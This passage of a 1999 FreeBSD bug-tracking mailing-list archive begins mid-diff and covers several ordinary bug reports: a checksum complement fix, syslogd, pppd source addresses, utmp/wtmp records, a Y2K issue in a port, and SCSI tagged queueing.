*iptr = line; /* first check for comment cards */ - if(buf[0] == 'c' || buf[0] == 'C' || buf[0] == '*') return(0); + if (buf[0] == 'c' || buf[0] == 'C' || buf[0] == '*') return(0); ptr = buf; - while (*ptr == ' ' || *ptr == '\t') ptr++; - if(*ptr == '\n') return(0); + trim(ptr); + if (*ptr == '\n') return(0); ptr = skiplab(buf); @@ -324,38 +342,43 @@ if ((ptr = look(line, "subroutine")) != 0 || (ptr = look(line, "function")) != 0 || (ptr = functs(line)) != 0) { - if(scan_name(s, ptr)) return(1); - strcpy( s, x); + if (scan_name(s, ptr, len)) return(1); + strcpy(s, x); } else if((ptr = look(line, "program")) != 0) { - if(scan_name(s, ptr)) return(1); - get_name( mainp, 4); - strcpy( s, mainp); + if(scan_name(s, ptr, len)) return(1); + get_name(mainp, 4); + strcpy(s, mainp); } else if((ptr = look(line, "blockdata")) != 0) { - if(scan_name(s, ptr)) return(1); - get_name( blkp, 6); - strcpy( s, blkp); + if(scan_name(s, ptr, len)) return(1); + get_name(blkp, 6); + strcpy(s, blkp); } else if((ptr = functs(line)) != 0) { - if(scan_name(s, ptr)) return(1); - strcpy( s, x); + if(scan_name(s, ptr, len)) return(1); + strcpy(s, x); } else { - get_name( mainp, 4); - strcpy( s, mainp); + get_name(mainp, 4); + strcpy(s, mainp); } return(1); } int -scan_name(s, ptr) +scan_name(s, ptr, len) char *s, *ptr; +int len; { + int cnt = 0; char *sptr; /* scan off the name */ trim(ptr); sptr = s; while (*ptr != '(' && *ptr != '\n') { - if (*ptr != ' ' && *ptr != '\t') + if (*ptr != ' ' && *ptr != '\t') { *sptr++ = *ptr; + cnt++; + if (cnt == len - 3) break; + } ptr++; } >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 13 13:20: 6 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 1B422150C5 for ; Mon, 13 Dec 1999 13:20:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id NAA27129; Mon, 13 Dec 1999 13:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 1C29015223 for ; Mon, 13 Dec 1999 13:11:37 -0800 (PST) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id QAA93209; Mon, 13 Dec 1999 16:11:33 -0500 (EST) (envelope-from wollman) Message-Id: <199912132111.QAA93209@khavrinen.lcs.mit.edu> Date: Mon, 13 Dec 1999 16:11:33 -0500 (EST) From: Garrett Wollman Reply-To: wollman@khavrinen.lcs.mit.edu To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: kern/15472: bug in in_cksum_finalize Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15472 >Category: kern >Synopsis: bug in in_cksum_finalize >Confidential: no >Severity: critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Dec 13 13:20:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Garrett Wollman >Release: FreeBSD 4.0-CURRENT i386 >Organization: MIT Laboratory for Computer Science >Environment: irrelevant. >Description: Brad Karp identified a deficiency in the in_cksum_finalize routine; it does not complement the sum as required. >How-To-Repeat: Attempt to use in_cksum_partial()/in_cksum_finalize() >Fix: (beware cut-and-paste-os) Index: in_cksum.c =================================================================== RCS file: /home/cvs/src/sys/i386/i386/in_cksum.c,v retrieving revision 1.16 diff -u -r1.16 in_cksum.c --- in_cksum.c 1999/08/28 00:43:44 1.16 +++ in_cksum.c 1999/12/13 21:07:20 @@ -411,5 +411,5 @@ { in_psum_t sum = psum; REDUCE; - return (sum & 0xffff); + return (~sum & 0xffff); } >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 13 13:22:26 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 5EC2215311; Mon, 13 Dec 1999 13:22:15 -0800 (PST) (envelope-from billf@FreeBSD.org) Received: (from billf@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id NAA27391; Mon, 13 Dec 1999 13:22:15 -0800 (PST) (envelope-from billf@FreeBSD.org) Date: Mon, 13 Dec 1999 13:22:15 -0800 (PST) From: Message-Id: <199912132122.NAA27391@freefall.freebsd.org> To: bmilekic@dsuper.net, billf@FreeBSD.org, freebsd-bugs@FreeBSD.org, green@FreeBSD.org Subject: Re: kern/14042: mbuf shortage and allocation with M_WAIT results in a panic Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: mbuf shortage and allocation with M_WAIT results in a panic State-Changed-From-To: open->closed State-Changed-By: billf State-Changed-When: Mon Dec 13 13:21:10 PST 1999 State-Changed-Why: Committed to -CURRENT. Responsible-Changed-From-To: freebsd-bugs->green Responsible-Changed-By: billf Responsible-Changed-When: Mon Dec 13 13:21:10 PST 1999 Responsible-Changed-Why: Brian committed the fixes. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 13 13:23:41 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 21FA214D00; Mon, 13 Dec 1999 13:23:40 -0800 (PST) (envelope-from billf@FreeBSD.org) Received: (from billf@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id NAA27628; Mon, 13 Dec 1999 13:23:39 -0800 (PST) (envelope-from billf@FreeBSD.org) Date: Mon, 13 Dec 1999 13:23:39 -0800 (PST) From: Message-Id: <199912132123.NAA27628@freefall.freebsd.org> To: jar@ntu-kpi.kiev.ua, billf@FreeBSD.org, freebsd-bugs@FreeBSD.org, green@FreeBSD.org Subject: Re: kern/14226: panic: no mbufs Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: panic: no mbufs State-Changed-From-To: open->closed State-Changed-By: billf State-Changed-When: Mon Dec 13 13:22:26 PST 1999 State-Changed-Why: Fixes were committed to -CURRENT to stop this, see kern/14042. Responsible-Changed-From-To: freebsd-bugs->green Responsible-Changed-By: billf Responsible-Changed-When: Mon Dec 13 13:22:26 PST 1999 Responsible-Changed-Why: Brian committed the fixes to stop this. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 13 13:28: 2 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from thoth.mch.sni.de (thoth.mch.sni.de [192.35.17.2]) by hub.freebsd.org (Postfix) with ESMTP id 7700B14E3A for ; Mon, 13 Dec 1999 13:27:41 -0800 (PST) (envelope-from andre.albsmeier@mchp.siemens.de) X-Envelope-Sender-Is: andre.albsmeier@mchp.siemens.de (at relayer thoth.mch.sni.de) Received: from mail1.siemens.de (mail1.siemens.de [139.23.33.14]) by thoth.mch.sni.de (8.9.3/8.9.3) with ESMTP id WAA13344 for ; Mon, 13 Dec 1999 22:23:57 +0100 (MET) Received: from curry.mchp.siemens.de (curry.mchp.siemens.de [139.25.42.7]) by mail1.siemens.de (8.9.3/8.9.3) with ESMTP id WAA22793 for ; Mon, 13 Dec 1999 22:23:57 +0100 (MET) Received: (from daemon@localhost) by curry.mchp.siemens.de (8.9.3/8.9.3) id WAA49994 for ; Mon, 13 Dec 1999 22:23:57 +0100 (CET) Date: Mon, 13 Dec 1999 22:23:53 +0100 From: Andre Albsmeier To: Dennis Boone Cc: freebsd-bugs@FreeBSD.ORG Subject: Re: bin/10553: syslogd suddenly stopped logging Message-ID: <19991213222353.A88868@internal> References: <199912131450.GAA82347@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <199912131450.GAA82347@freefall.freebsd.org>; from drb@msu.edu on Mon, Dec 13, 1999 at 06:50:02AM -0800 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hmm, don't know if it is related but I got a similar syslog problem: Running syslogd on a machine M with two interfaces. Let interface 1 be named ifc1.my.domain.org and let interface 2 be named ifc2.otherdomain.org. Normally, syslogd logs to a host L named log.my.domain.org. All this traffic goes via a FreeBSD router R with the interfaces named r1.my.domain.org and r2.my.domain.org. M R L ------------- --------- ----- outer world ---|ifc2 ifc1|-----|r1 r2|-----|log| ------------- --------- ----- M logs directly to the syslogd on L. The packets go via R. Everything is allright, tcpdump shows: 07:10:37.203164 ifc1.my.domain.org.syslog > log.my.domain.org.syslog: udp 36 07:10:43.420084 ifc1.my.domain.org.syslog > log.my.domain.org.syslog: udp 36 07:10:45.444710 ifc1.my.domain.org.syslog > log.my.domain.org.syslog: udp 65 Now, let's assume R is being rebooted and comes up again. No more syslog messages make it through from M to L. Instead tcpdump shows the following: 07:11:09.139434 ifc2.otherdomain.org.syslog > log.my.domain.org.syslog: udp 36 07:11:24.738422 ifc2.otherdomain.org.syslog > log.my.domain.org.syslog: udp 58 07:11:26.549774 ifc2.otherdomain.org.syslog > log.my.domain.org.syslog: udp 36 07:11:28.809938 ifc2.otherdomain.org.syslog > log.my.domain.org.syslog: udp 36 07:11:32.748879 ifc2.otherdomain.org.syslog > log.my.domain.org.syslog: udp 49 We see that packages now come from ifc2 and still want to go to log.my.domain.org (as it was configured in syslogd.conf). When syslogd is killed and restarted on M, everything works again... All machines (H, R and L) are 3.4-RC machines. They work well for all other stuff (M does www proxying, mail, ...). To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 13 14:30: 3 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 087DB14C16 for ; Mon, 13 Dec 1999 14:30:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id OAA33620; Mon, 13 Dec 1999 14:30:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Mon, 13 Dec 1999 14:30:01 -0800 (PST) Message-Id: <199912132230.OAA33620@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Johan Karlsson Subject: Re: i386/14333: AHA-1542A not supported by FreeBSD 3.x ("compensating") Reply-To: Johan Karlsson Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR i386/14333; it has been noted by GNATS. From: Johan Karlsson To: freebsd-gnats-submit@freebsd.org Cc: Subject: Re: i386/14333: AHA-1542A not supported by FreeBSD 3.x ("compensating") Date: Mon, 13 Dec 1999 23:26:59 +0100 Please close. Duplicate of i386/14334. /K -- Johan Karlsson mailto:k@numeri.campus.luth.se To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 13 17:59:23 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 4202D15346; Mon, 13 Dec 1999 17:59:22 -0800 (PST) (envelope-from obrien@FreeBSD.org) Received: (from obrien@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id RAA51384; Mon, 13 Dec 1999 17:59:22 -0800 (PST) (envelope-from obrien@FreeBSD.org) Date: Mon, 13 Dec 1999 17:59:22 -0800 (PST) From: Message-Id: <199912140159.RAA51384@freefall.freebsd.org> To: obrien@FreeBSD.org, freebsd-bugs@FreeBSD.org, dg@FreeBSD.org Subject: Re: kern/15455: Intel EtherExpress Pro does not properly attach on the Alpha Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Intel EtherExpress Pro does not properly attach on the Alpha Responsible-Changed-From-To: freebsd-bugs->dg Responsible-Changed-By: obrien Responsible-Changed-When: Mon Dec 13 17:59:00 PST 1999 Responsible-Changed-Why: Knows more about fxp than anyone. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 13 19:40: 4 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 54497154EE for ; Mon, 13 Dec 1999 19:40:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id TAA59944; Mon, 13 Dec 1999 19:40:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 4390F15373; Mon, 13 Dec 1999 19:30:39 -0800 (PST) Message-Id: <19991214033039.4390F15373@hub.freebsd.org> Date: Mon, 13 Dec 1999 19:30:39 -0800 (PST) From: jan@caustic.org To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: misc/15474: time server entry in /etc/services on freebsd 3.x Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15474 >Category: misc >Synopsis: time server entry in /etc/services on freebsd 3.x >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Mon Dec 13 19:40:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: fj beisser >Release: 3.4-RC >Organization: >Environment: FreeBSD winter.caustic.org 3.4-RC FreeBSD 3.4-RC #2: Mon Dec 13 05:22:16 PST 1999 root@winter.caustic.org:/usr/src/sys/compile/WINTER i386 >Description: time server entry in /etc/services is misspelled. time 37/tcp timserver time 37/udp timserver >How-To-Repeat: >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 13 23:20: 6 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 63C3814E93 for ; Mon, 13 Dec 1999 23:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id XAA79326; Mon, 13 Dec 1999 23:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from eve.mogami-wire.co.jp (eve.mogami-wire.co.jp [210.161.93.162]) by hub.freebsd.org (Postfix) with ESMTP id E212715322 for ; Mon, 13 Dec 1999 23:14:30 -0800 (PST) (envelope-from kh@mogami-wire.co.jp) Received: from sf.mogami-wire.co.jp (sf8 [202.23.252.208]) by eve.mogami-wire.co.jp (8.8.8/3.6W-eve) with ESMTP id QAA28319 for ; Tue, 14 Dec 1999 16:14:25 +0900 (JST) Received: (from kh@localhost) by sf.mogami-wire.co.jp (8.9.3/3.6Wbeta6-sf) id PAA01014; Tue, 14 Dec 1999 15:38:08 GMT Message-Id: <199912141538.PAA01014@sf.mogami-wire.co.jp> Date: Tue, 14 Dec 1999 15:38:08 GMT From: kh@mogami-wire.co.jp Reply-To: kh@mogami-wire.co.jp To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: kern/15475: pppd(8) sets the Source Address field of IP Header to 0.0.0.0 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15475 >Category: kern >Synopsis: pppd(8) sets the Source Address field of IP Header to 0.0.0.0 >Confidential: no >Severity: serious >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Dec 13 23:20:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Kouichi Hirabayashi >Release: FreeBSD 3.3-RELEASE i386 >Organization: Mogami Wire & Cable Corp. >Environment: FreeBSD-3.3R i386 >Description: pppd(8) sets the Source Address field of IP Header to 0.0.0.0 but negotiated local IP address. >How-To-Repeat: By monitoring with 'tcpdump -i ppp0', do /usr/sbin/pppd connect 'chat "" "ATD" "CONNECT"' \ /dev/cuaa0 user to some dial-up ppp server (whitch requests CHAP authentification) with following file. --- /etc/ppp/options --- 38400 modem crtscts debug noipdefault ipcp-accept-local ------------------------ --- /etc/ppp/chap-secrets --- * * ----------------------------- Typycal dump list is as follows. 14:50:20.299715 0.0.0.0.1034 > 10.0.5.195.5020: S \ 1510878817:1510878817(0) win 16384 (DF) .. On FreeBSD-2.2.8R, typical dump list is as follows. 11:04:52.633283 202.23.252.137 > 10.0.5.195.5020: S \ 250102342:250102342(0) win 16384 (DF) .. >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 14 0: 4:38 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from giganda.komkon.org (giganda.komkon.org [209.125.17.66]) by hub.freebsd.org (Postfix) with ESMTP id 41C6F1531E; Tue, 14 Dec 1999 00:04:35 -0800 (PST) (envelope-from str@giganda.komkon.org) Received: (from root@localhost) by giganda.komkon.org (8.9.3/8.9.3) id DAA50196; Tue, 14 Dec 1999 03:04:21 -0500 (EST) Date: Tue, 14 Dec 1999 03:04:21 -0500 (EST) From: Igor Roshchin Message-Id: <199912140804.DAA50196@giganda.komkon.org> To: andreas@klemm.gtn.com Subject: wwwstat-2.01 port is not Y2K compliant Cc: freebsd-bugs@FreeBSD.ORG, ports@FreeBSD.ORG Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello! I just found that the wwwstat-2.01 port still has not been fixed, and is not Y2K compliant: For example: the file "monthly": $ArcStats = '/dc/ud/www/documentroot/Admin/stats-19' . $year . '/' . $LastMonth . '.wwwstats.html'; It relies on the 2-digit representation of the year (from $year), and adds "19" before it. I am not sure if other files in the package have similar problem. I just submitted a PR via web-interface. Regards, Igor To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 14 0:30:51 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id B691E15640 for ; Tue, 14 Dec 1999 00:30:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id AAA85517; Tue, 14 Dec 1999 00:30:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 150DD14A2D; Tue, 14 Dec 1999 00:24:05 -0800 (PST) Message-Id: <19991214082405.150DD14A2D@hub.freebsd.org> Date: Tue, 14 Dec 1999 00:24:05 -0800 (PST) From: str@giganda.komkon.org To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: kern/15478: incorrect utmp/wtmp records update upon connection being interrupted Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15478 >Category: kern >Synopsis: incorrect utmp/wtmp records update upon connection being interrupted >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Dec 14 00:30:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Igor Roshchin >Release: 3.x-stable >Organization: KomKon >Environment: FreeBSD 3.3-RELEASE i386 FreeBSD 3.1-STABLE i386 >Description: 1. The record in wtmp file is not updated properly. This seems to be happening when the connection dies (e.g. "reset by peer"), say, when a people connected from a ppp-via-dialup host gets kicked off by a modem, and the connection is not disconneted properly. 2. The utmp record is not updated either. So, "w" shows a person being logged in, even though there are no processes running on that tty. (accordingly w shows "-" as a current process). When somebody else logs in on that tty, the utmp record is updated, but not the wtmp one. In most cases, if not in all, the users use "screen". I am not sure if the use of screen is necessary condition or just a coinsidence. Additional information: I've got responses that the problem is also observed in 3.3-STABLE (Nov 16) & 4.0-CURRENT (Sept 29) and also without screen, but rather due to WindowMaker unconditionally killing rxvt (from Will Andrews). (" I have X11 + WindowMaker setup to run a rxvt w/ top & xtail /var/log whenever it starts up.") In that case, "w" shows incorrect idle time which might be even greater than the uptime. >How-To-Repeat: I am not sure if it works every time, but.. Login (via telnet or ssh) from a dialup-PPP-host, reattach running screen. Harshly disconnect the modem. Also, suggested by Will Andrews: (From his e-mail) ========= I have X11 + WindowMaker setup to run a rxvt w/ top & xtail /var/log whenever it starts up. I never kill these apps, so WindowMaker does the job. Unfortunately, the utmp & wtmp logs are affected as you say above: <2 5001-0> (99-12-11 17:02:42) [will@shadow ~]% w 5:02PM up 6 days, 19:40, 9 users, load averages: 1.02, 1.08, 1.07 USER TTY FROM LOGIN@ IDLE WHAT will v0 - 12:59PM 4:03 xinit /home/will/.xini will p0 unix:0 12:59PM 6days top will p1 unix:0 12:59PM 27days xtail /var/log Note that ttyp1's idle time is 27 days whereas my system uptime is only 6 days. Also note that I've only been running X for 4 hours. Because WindowMaker unconditionally kills these rxvt's, the utmp & wtmp files are not cleaned up properly, and I get a result like the above. ========== >Fix: Check utmp/wtmp related functions... Sorry, don't have better clue. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 14 0:40: 5 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 097171530D for ; Tue, 14 Dec 1999 00:40:04 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id AAA86542; Tue, 14 Dec 1999 00:40:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Tue, 14 Dec 1999 00:40:03 -0800 (PST) Message-Id: <199912140840.AAA86542@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Ken Harrenstien Subject: Re: kern/15448: Would be nice if the kernel could detect/report problems with SCSI tagged queueing Reply-To: Ken Harrenstien Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR kern/15448; it has been noted by GNATS. From: Ken Harrenstien To: "Kenneth D. Merry" Cc: klh@netcom.com, freebsd-gnats-submit@FreeBSD.ORG Subject: Re: kern/15448: Would be nice if the kernel could detect/report problems with SCSI tagged queueing Date: Tue, 14 Dec 99 0:37:04 PST > On Sun, Dec 12, 1999 at 06:52:28PM -0800, klh@netcom.com wrote: > > >Synopsis: Would be nice if the kernel could detect/report problems with SCSI tagged queueing > > [ ... ] > > > FreeBSD 3.1-RELEASE FreeBSD 3.1-RELEASE #: i386 > > >Description: > > I just spent a nerve-wracking day backing up some drives that I thought > > were about to crash their little heads, only to finally discover that > > the problem was a failure of SCSI command tagged queueing to work > > properly. > > > > I was very surprised that even though I was getting user program I/O > > errors (from tar), the kernel gave me no feedback at all on the > > console. This was really mystifying. I don't know enough about how > > tagging works to know whether it's even feasible to detect when it's > > not working -- but the kernel is clearly getting SOME kind of error > > that it's relaying back to the user. > > > > Would it be possible to make sure that I/O errors of this nature send > > *something* to the console log? (Actually, that's a good idea for > > any sort of I/O error; I know most of them are reported OK). This > > would be a huge help tracking down potentially buggy drives; the effort > > to zero in on this possibility is otherwise very time-consuming. > > I don't know why the kernel didn't print out any errors, but you'll get a > lot more information if you boot with the '-v' switch. At the boot loader > prompt, you can type: > > boot kernel -v I know about (and like) -v, but it doesn't make any difference. Which is to say, there is no error output either way. Just user-level I/O errors except when a page transfer fails, in which case the pager code then complains. Never the CAM subsystem. One way of verifying this might be to test with a known broken drive after re-enabling tagged queueing, and see what happens in the way of error reporting. Unfortunately I don't have any of the ones in the current table or I could do that test. Regardless of the actual cause of the I/O errors, it is still worrisome to me that there is no kernel log output at all. --Ken To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 14 2:30: 9 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 0B72014C42 for ; Tue, 14 Dec 1999 02:30:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id CAA95100; Tue, 14 Dec 1999 02:30:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Tue, 14 Dec 1999 02:30:02 -0800 (PST) Message-Id: <199912141030.CAA95100@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Ken Harrenstien Subject: Re: kern/15446: Unpredictable enabling of SCSI Tagged Queueing Reply-To: Ken Harrenstien Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR kern/15446; it has been noted by GNATS. From: Ken Harrenstien To: "Kenneth D. Merry" Cc: klh@netcom.com, freebsd-gnats-submit@FreeBSD.ORG Subject: Re: kern/15446: Unpredictable enabling of SCSI Tagged Queueing Date: Tue, 14 Dec 99 2:29:52 PST > On Sun, Dec 12, 1999 at 06:18:55PM -0800, klh@netcom.com wrote: > > > > >Number: 15446 > > >Category: kern > > >Synopsis: Unpredictable enabling of SCSI Tagged Queueing > > [ ... ] > > > FreeBSD 3.1-RELEASE FreeBSD 3.1-RELEASE #: i386 > > >Description: > > Whether or not a device capable of tagged queueing is actually flagged > > as such appears to be semi-random. It can be different for two identical > > drives, and can change from one boot to the next of the same kernel. > > > > For example, on one recent boot, two identical drives give this: > > da0: 10.0MB/s transfers (10.0MHz, offset 15), Tagged Queueing Enabled > > ... > > da2: 10.0MB/s transfers (10.0MHz, offset 15) > > > > In conjunction with another problem which I am filing separately (the > > possibility that the Seagate ST32550WC is broken with respect to > > tagged queueing) this causes my system to sometimes work and sometimes > > fail depending on the level of disk activity. I did not notice this > > earlier because until recently I have not significantly stressed the > > disk I/O. Now that it's a problem I've reviewed the system logs for > > the past few months and found that sometimes tagged queueing was > > enabled and sometimes not. > > > > FWIW the version of cam_xpt.c in my source tree is 1.42. There are > > a few too many things involved in the enable/disable code for me to be > > certain what is going on or whether the flags are even being initialized > > properly. > > There are several ways to enable or disable tagged queueing: > > - If the DQue bit in mode page 10 is set, tagged queueing will be disabled > for the drive in question. If you want to view/edit mode page 10, see > the camcontrol(8) man page for details. > > - If the drive is quirked in cam_xpt.c to have 0 tags. The only Seagate > drives quirked in cam_xpt.c are the Seagate Medalist Pro drives. > Seagate's web site says that the 32550 is a 2 gig Barracuda. I've never > seen tagged queuing problems with Barracudas. > > - If tagged queueing is enabled/disabled from userland via camcontrol(8). > Since this camcontrol option appeared in FreeBSD 3.2, that isn't an > option in your situation. > > My guess is that somehow the tagged queueing bit is being enabled and > disabled in the drive firmware. None of the other ways of tweaking the > tagged queueing settings would explain the behavior you're seeing. > > Check the settings in mode page 10 with camcontrol and see whether the > drive says tagged queueing is enabled or disabled. If the DQue bit is set, > the drive should not be reported as a tagged queueing drive in the dmesg. > > If the DQue bit is set and then cleared somehow between boots on your > system, that points fairly strongly to some sort of problem with the drive. Examining mode page 10 as you suggest reveals no changes between boots, although the system's idea of the tagged queueing status continues to vary. More interestingly, a "camcontrol inquiry" shows all 4 of the drives as having Tagged Queueing. This information also does not change between boots. My own theory is more simplistic. I wonder if the data structures responsible for noting the tagged-queueing status are simply not being initialized properly. I can't be absolutely certain, but so far it seems to me that if I continue to reboot using the same kernel and boot flags, I keep getting the same drives enabled (or disabled); if I vary either the kernel version or the presence of -v, the selection will change. Leftover memory values? Buffer junk? I am going to include 3 chunks of stuff here: (1) the results of "camcontrol inquiry" for all drives (constant) (2) mode page 10 for all drives (constant) (3) dmesg output for a sample boot (varies) Note that for this particular boot, only the da0 Seagate is marked as having Tagged Queueing enabled. On other boots, both Seagates (da0 & da2) are enabled; on still others, just da1 is enabled! The da3 Fujitsu has also turned up in past logs, although it's quite rare. --Ken -------------------- bohica:/home/klh# camcontrol inquiry -u 0 -DR Fixed Direct Access SCSI-2 device 10.0MB/s transfers (10.0MHz, offset 15), Tagged Queueing Enabled bohica:/home/klh# camcontrol inquiry -u 1 -DR Fixed Direct Access SCSI-2 device 10.0MB/s transfers (10.0MHz, offset 15), Tagged Queueing Enabled bohica:/home/klh# camcontrol inquiry -u 2 -DR Fixed Direct Access SCSI-2 device 10.0MB/s transfers (10.0MHz, offset 15), Tagged Queueing Enabled bohica:/home/klh# camcontrol inquiry -u 3 -DR Fixed Direct Access SCSI-2 device 10.0MB/s transfers (10.0MHz, offset 15), Tagged Queueing Enabled 